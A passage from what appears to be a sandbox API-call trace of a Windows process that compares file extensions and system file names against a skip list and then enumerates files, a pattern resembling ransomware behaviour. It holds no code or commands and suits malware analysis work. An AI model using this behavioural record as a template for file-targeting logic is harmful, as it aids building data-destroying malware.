cchCount2=3) returned 1 [0100.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="MUI", cchCount2=3) returned 3 [0100.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="MUI", cchCount2=3) returned 3 [0100.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="MUI", cchCount2=3) returned 3 [0100.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="MUI", cchCount2=3) returned 1 [0100.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="MUI", cchCount2=3) returned 1 [0100.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 1 [0100.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 1 [0100.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 1 [0100.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="MUI", cchCount2=3) returned 1 [0100.468] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.468] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.468] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.468] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.468] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.468] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.468] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.468] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.468] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.468] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.468] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="MUI", cchCount2=3) returned 3 [0100.468] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="MUI", cchCount2=3) returned 3 [0100.468] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="MUI", cchCount2=3) returned 3 [0100.468] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.468] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.468] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="MUI", cchCount2=3) returned 1 [0100.468] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="MUI", cchCount2=3) returned 1 [0100.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 1 [0100.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 1 [0100.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 1 [0100.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="MUI", cchCount2=3) returned 1 [0100.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="MUI", cchCount2=3) returned 3 [0100.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="MUI", cchCount2=3) returned 3 [0100.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="MUI", cchCount2=3) returned 3 [0100.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="MUI", cchCount2=3) returned 1 [0100.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="MUI", cchCount2=3) returned 1 [0100.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.471] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.471] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 1 [0100.471] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 1 [0100.471] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 1 [0100.471] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.471] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.471] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.471] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.471] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="MUI", cchCount2=3) returned 1 [0100.471] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.471] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.471] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.471] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.471] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.471] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.471] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.471] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.471] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.471] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.472] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="MUI", cchCount2=3) returned 3 [0100.472] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="MUI", cchCount2=3) returned 3 [0100.472] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="MUI", cchCount2=3) returned 3 [0100.472] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.472] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.472] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="MUI", cchCount2=3) returned 1 [0100.472] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="MUI", cchCount2=3) returned 1 [0100.472] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.472] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.472] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.472] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.472] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.472] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0100.472] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0106.992] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0106.992] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0106.992] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0106.992] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0106.992] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0106.992] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.570] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.570] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.570] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.570] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.570] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.570] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.570] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.571] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.571] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.571] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.571] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.571] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.571] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.571] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.571] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.571] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.571] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.571] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.571] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.571] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.571] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.571] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.571] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.587] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.587] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.587] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.587] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.587] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.587] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.587] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.587] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.587] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.587] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.587] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.587] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.587] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.587] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.587] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.587] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.587] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.587] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.587] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.587] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.587] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.587] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.587] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.608] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.608] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.608] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.608] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.608] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.608] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.608] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.608] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.609] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.609] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.609] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.609] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.609] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.609] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.609] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.609] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0107.609] FindNextFileW (in: 